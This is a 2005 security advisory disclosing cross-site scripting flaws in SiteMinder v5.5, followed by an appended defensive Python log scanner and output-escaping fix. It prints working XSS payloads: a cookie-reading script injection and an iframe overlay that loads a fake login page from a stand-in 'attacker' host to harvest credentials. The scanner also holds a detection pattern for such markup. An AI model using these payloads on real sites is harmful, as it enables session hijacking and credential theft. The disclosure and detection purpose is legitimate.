Network Security Vuln-Dev

SiteMinder Multiple Vulnerabilities

Subject: SiteMinder Multiple Vulnerabilities
Date: 8 Jul 2005 14:03:11 -0000
 /*

 *****************************************************************************************************************
  $ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
 *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 08 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Remote
 *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
 *****************************************************************************************************************

  Siteminder
  http://www3.ca.com/Solutions/Product.asp?ID=5262

  "eTrust™ SiteMinder® is a market-leading, security and management foundation for enterprise Web applications with a centralized security infrastructure for managing user authentication and access. eTrust SiteMinder delivers the market's most advanced security management capabilities and enterprise-class site administration, reducing overall IT operational cost and complexity. eTrust SiteMinder enables the secure delivery of essential information and applications to employees, partners, suppliers and customers, and scales with growing business needs."

  Siteminder is vulnerable to XSS: a user can tag HTML or JavaScript on to various locations in a URL or input field and have the script run in the local user's browser. This can be used to perform phishing attacks, to hijack users' browser sessions, or to capture user account information by redrawing the login page of a site.

  http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>

  The following link abuses the URL option by first logging the user out of the site with a timeout error (because we send her off to another HTTPS site), which takes the user back to the login page. Next, we open an IFRAME over the original login fields with malicious Username and Password input fields, so the user then supplies their login details to a malicious site, to be later harvested and used in an attack.

  http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html"><iframe bgcolor="white" src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe>

  To test if you are vulnerable to this issue, you can tag the following on to the end of a siteminder URL. If it is successful, you should see the Google homepage within an IFRAME.

  "><iframe bgcolor="white" src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe>


  /* snoop.html */
  <html>
    <head></head>
  <body>
    <form>
     User ID
      <input type="text" name="UserID">
     <br>
     Password:
      <input type="text" name="Password">
      <input type="submit" value="Submit">
    </form>
  </body>
  </html>


  I have contacted Netegrity via ca.com multiple times but received no response; as such, users should use a filtering technology like modsecurity to detect the above described attacks until a fix has been released.

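As an added illustration of the filtering the advisory recommends, and of the output-encoding fix that removes the bug, here is a detector that scans web server access log lines for markup in the SiteMinder parameters named above, plus an escaped rendering of the echoed form field. This is example code written for this page, not code from the advisory, SiteMinder or modsecurity; the log lines are constructed.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints and parameters named in the advisory.
WATCHED_PATHS = ("/siteminderagent/pwcgi/smpwservicescgi.exe",
                 "/siteminderagent/forms/login.fcc")
WATCHED_PARAMS = {"SMAUTHREASON", "TARGET", "USERNAME", "PASSWORD", "BUFFER"}
# Markup that has no business inside a login-form parameter: an opening tag of
# a scriptable element, an attribute-breakout quote followed by '>', or a
# javascript: URL.
MARKUP = re.compile(r'<\s*/?\s*(script|iframe|img|svg|object)\b|"\s*>|javascript:',
                    re.IGNORECASE)

def suspicious_params(request_line):
    """Return {param: values} for watched parameters whose decoded value carries markup."""
    _method, target, _proto = request_line.split(" ", 2)
    url = urlsplit(target)
    if url.path not in WATCHED_PATHS:
        return {}
    # parse_qs percent-decodes each value, so %22%3E%3Cscript%3E becomes "><script>.
    params = parse_qs(url.query, keep_blank_values=True)
    return {k: v for k, v in params.items()
            if k in WATCHED_PARAMS and any(MARKUP.search(x) for x in v)}

def scan_access_log(lines):
    """Yield (client_ip, offending params) for each suspicious request in common log format."""
    for line in lines:
        client = line.split(" ", 1)[0]
        request = line.split('"')[1]        # the text inside the first "..." pair
        hits = suspicious_params(request)
        if hits:
            yield client, hits

def render_field(name, value):
    """The fix: HTML-escape the echoed value so '">' cannot close the attribute."""
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'

SAMPLE_LOG = [  # constructed log lines: one attack, one ordinary login
    '203.0.113.5 - - [08/Jul/2005:14:03:11 +0000] "GET /siteminderagent/pwcgi/smpwservicescgi.exe'
    '?SMAUTHREASON=0&TARGET=&USERNAME=hacker&PASSWORD=%22%3E%3Cscript%3Ealert(document.cookie)'
    '%3C/script%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Jul/2005:14:04:00 +0000] "GET /siteminderagent/forms/login.fcc'
    '?TYPE=1&SMAUTHREASON=32&TARGET=http://site.com/app HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, hits in scan_access_log(SAMPLE_LOG):
        print(client, sorted(hits))          # 203.0.113.5 ['PASSWORD']
```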